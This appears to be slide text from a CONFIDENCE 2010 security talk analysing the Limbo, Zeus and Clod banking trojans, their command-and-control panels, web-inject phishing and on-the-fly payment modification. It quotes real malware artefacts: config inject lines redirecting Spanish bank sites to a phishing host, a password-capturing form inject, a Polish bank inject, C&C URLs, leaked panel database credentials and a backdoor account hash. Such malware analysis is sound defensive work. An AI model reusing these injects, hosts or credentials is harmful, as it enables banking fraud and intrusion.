Encrypted communication channel (XOR) DB for management – logs in files
CONFIDENCE 2010 46
Limbo – admin panel
CONFIDENCE 2010 47
LIMBO – phishing site sample
CONFIDENCE 2010 48
Limbo – how to decode config file and communication channel
CONFIDENCE 2010 49
Limbo config inject sample
CONFIDENCE 2010 50
<dnsmask dns="cajamadrid.es" to="http://www.goldenolivegc.net/photos/s/es/cajamadrid/conto.php" param="Documento_s"></dnsmask>
<dnsmask dns="cajamadridempresas.es" to="http://www.goldenolivegc.net/photos/s/es/cajamadrid/conto.php" param="selopcion_s"></dnsmask>
<dnsmask dns="bancamarch" to="http://www.goldenolivegc.net/photos/s/es/bancamarch/conto.php" param="usuario"></dnsmask>
<inject url="inversis" before="name=claveUsuario></TD></TR>" what="<TR><TD class=pass> </TD> <TD class=pass>Firma</TD></TR> <TR><TD class=pass> </TD> <TD class=pass colSpan=2> <INPUT class=passtf tabIndex=3 type=password maxLength=15 size=14 value='' name=S3NT0> </TD></TR>" check="S3NT0" block="boton_ok.gif" quan="8" ></inject>
Limbo sample
http://www.kapustun.cn/datac.php?userid=18062008_100224_168171
HKEY_LOCAL_MACHINE\SOFTWARE\MRSoft %System%\haskel32.dll (BHO – IE) %System%\xmd.dat – encoded config file alog.txt – data caputed cmds.txt – commands from C&C Specific dirs:
• Zips• Sets• Logs
CONFIDENCE 2010 51
Limbo dirs C&C
zips – updates admin panel (user/pass hardcoded in file)
sets – packed zip logs logs – txt files with log (each file = uniqe
infected workstation) fls certs PhpMyAdmin
CONFIDENCE 2010 52
LIMBO vulnerabilities
http://www.threatexpert.com/report.aspx?md5=53516de117adc4556621e46418113199
GET http://6arada.cn:80/rasta/connection.inc HTTP/1.0
host: 6arada.cn HTTP/1.1 200 OKDate: Wed, 15 Jul 2009 02:58:10 GMTServer: Apache/2.2.3 (CentOS)Last-Modified: Wed, 27 May 2009 00:21:52 GMTETag: "1b0337-11b-d4792800"Accept-Ranges: bytesContent-length: 283Connection: closeContent-Type: text/plain; charset=koi-8
<?php
$mysql=mysql_connect('localhost','admin_admin','qwerty');
if (!$mysql) {
echo "Cannot connect to DB !";
exit;
}
$db=mysql_select_db('admin_admin');
if (!$db) {
echo "Cannot select DB Admin!";
exit;
}
?> CONFIDENCE 2010 53
/zip/kk.zip
<?php error_reporting(1); $mysql=mysql_pconnect('localhost','hwknz_limbo','HJ3sxiHn'); if (!$mysql) { echo "Cannot connect to DB !"; exit; }
$db=mysql_select_db('hwknz_limbo'); if (!$db) { echo "Cannot select DB Admin!"; exit; }?>
ZEUS
C&C server:• PHPscripts• DB MySQL - konfiguracja i dane zbierane z botów• Admin panel
New updares (exe files) on separate server New configs on separate server (.bin)
======================================= Server that provide phishing pages Server that hosts scripts that modify transsactions
on the fly
CONFIDENCE 2010 54
ZEUS
Components• C&C serwers• Phishing server with content (in some cases)
ZEUS injects malicious phishing content Phishing types:
• Redirects to phishing page on phishing server• Modifies original WWW pages on the fly • Modify transaction on the fly
– JavaScript framework
CONFIDENCE 2010 55
ZEUS analysis
CONFIDENCE 2010 56
ZEUS - decoder
CONFIDENCE 2010 57
ZEUS - functions
Confirmed with reverse enginering analysis:• proxy SOCKS v4 i v5 • capturing screenshots -> C&C • Capture and modify internet communication from applications that use API
network functions (wininet.dll ) – this comproimitat internet browser behaviour• Inject HTML into browser (webinjects ) • Lanch any exe file on remote worstation• KillWIN and reboot• Blocking connection with chosen hosts• Communication channel encrypted with RC4• Config encoded with rc4 and additional algorythms
From bot documentation: • Capturing POP3, FTP credentials• Capturing any data from TCP/IP• Search on workstation and upload chosen files to C&C • ProtectedStorage dumps• Backconnect – connect with host behind NAT ) • Erasing cookies
CONFIDENCE 2010 58
ZEUS and Windows API
Windows API functions:• HTTPSendRequestA• HTTPSendRequestW• HTTPSendRequestExA• HTTPSendRequestExW• InternetCloseHandleA• InternetQueryDataAvailable• InternetReadFile• InternetReadFileExA• InternetReadFileExW• QueryInfoA• QueryInfoW
CONFIDENCE 2010 59
ZEUS – cert grabing
PFXExportCertStore Windows - API function that Export all certs and
keys from MS protected storage – old functions that was left for compatibility propose with IE 4.0
Works even if certs and keys are set not for export and protected with password
CONFIDENCE 2010 60
ZEUS - WebInjectShop
CONFIDENCE 2010 61
ZEUS - WebInjectShop
CONFIDENCE 2010 62
ZEUS
Semi-dynamic phishing – redirects to phishing sites (7 polish systems)
Dynamic Phishing (changes transactions on the fly) – (4 polish sites) – money mules
Dynamic Phishing - (SMS MiM) – only one incident that is known –> it was a test
Limbo vs Zeus – at the beginning attack covered Portuguese and Spanish sites (probably the same phishing group)
Most popular crime kit – now is public (same as limbo)
New version 2.X with hardware key? (currently under analysis)
CONFIDENCE 2010 63
ZEUS - Changing payment details on the fly
JavaScript framework Change pahment details on the fly Checks how many money user has on different
account Chooses account with the highest money amount C&C sends information about money mule and how
many money will be stolen If user will not confirm pament deatils in SMS it
works also for SMS Changes balance history of the account on client
side
CONFIDENCE 2010 64
ZEUS - Changing payment details on the fly
‘FAKTURA XXX/YY.ZZZ::Homer Money Mule::56-000::Ząbki::Mirosława Wielkiego 10::YYXXXXX0000000XXXXXXXX::30000‘;
CONFIDENCE 2010 65
ZEUS vulns
Some instances contains backdoors• Backdoor php code in control panel • Possible to create php shell (tamper the name of the file that
stores user logs - in communication channel)• config.php.bak (db credentials) + phpmyadmin• First versions - SQLinjection
CONFIDENCE 2010 66
Malicious code add user ,,system” with password hash ,,e99a18c428cb38d5f260853678922e03”
Backdoor html and javascript code in control panel theme file.Malicious code send control panel address into script placed on hacked server - ,, http://abacus-autos.com/cars/b.php”.
Looking for ZEUS exploits in the wild (our honeypot)
CONFIDENCE 2010 67
bogus php spripts was created - that simulated orginal ZEUS admin panel (C&C)
Add domain to different public sandboxes Wait…
After four days – alert ! Somebody log into our zeus control panel :-) so we started to analyze logs. We found that there was uploaded same extra php file with .dat extension and one .htaccess file.
.htaccess make .dat extensions to be interpreted as php file.
CLOD
ZEUS and LIMBO shows the trends that others malware follow
Hybrid – two configs• Limbo format• Zeus format
Two polish banks attacked (at the time of analysis) Configs encrypted with simple XOR (XOR from 5 first
bytes of config file gives one byte XOR key) Rooktit Files:
• chck.dat• pst.dat• ms32clod.dll
No vulnerabilities found (during time of analysis)CONFIDENCE 2010 68
CLOD – API functions
Windows API functions:• CreateFileW• PFXImportCertStore• InternetConnect• HttpOpenRequestA• HttpSendRequestW• HttpSendRequestA • InternetQueryDataAvailable• InternetReadFile• InternetReadFileEx• InternetSetStatusCallback• RegEnumValueW• WSASend
CONFIDENCE 2010 69
CLOD – get account balance (zeus inject)
data_before
<p>Stan Twoich rachunkуw.</p></td>
data_end
data_inject
data_end
data_after
<input tabindex="10" name="btn_print_balances" type="image" src="/img/skins/2003/button-drukuj-salda.gif"
data_end
CONFIDENCE 2010 70
Summary
All authorization functions that do not link auth code with transactions details is vulnerable
Even if function is strong eg. SMScode or TDS, attack still can be made (if user do not verify transfer details during authorization on security device – eg. TDS token, SMScode)
Only one main function in malware is necessary for phishing – HTMLinjects
HTMLinject – plugins that can be used in different malwares – phishing is made on HTML/JavaScript framework Level – this is the trend and future for phishing malwares
There is no method that will enforce user to verify
what he signs in methods with auth_code that is
linked with transaction details ;-(
all metod can failCONFIDENCE 2010 71
Ideas for the future
Phishing monitoring• Money mule monitoring• Monitoring Changes of phishing content• Monitoring new version of malwares• Identification of infected customers– log corelations • Correlations money flows between money mules accounts • Gathering phishing logs
Cooperation with the largest ISP (services for banks)• Blackholing• High and low level analysis (for risk management proposes)• Traffic analysis
Cooperation with ISP (end users)• Data leakage prevention – Blackholing
tracking changes in phishing content - automatic system that decodes configuration files
from chosen malwares
CONFIDENCE 2010 72
73CONFIDENCE 2010
QUESTIONS?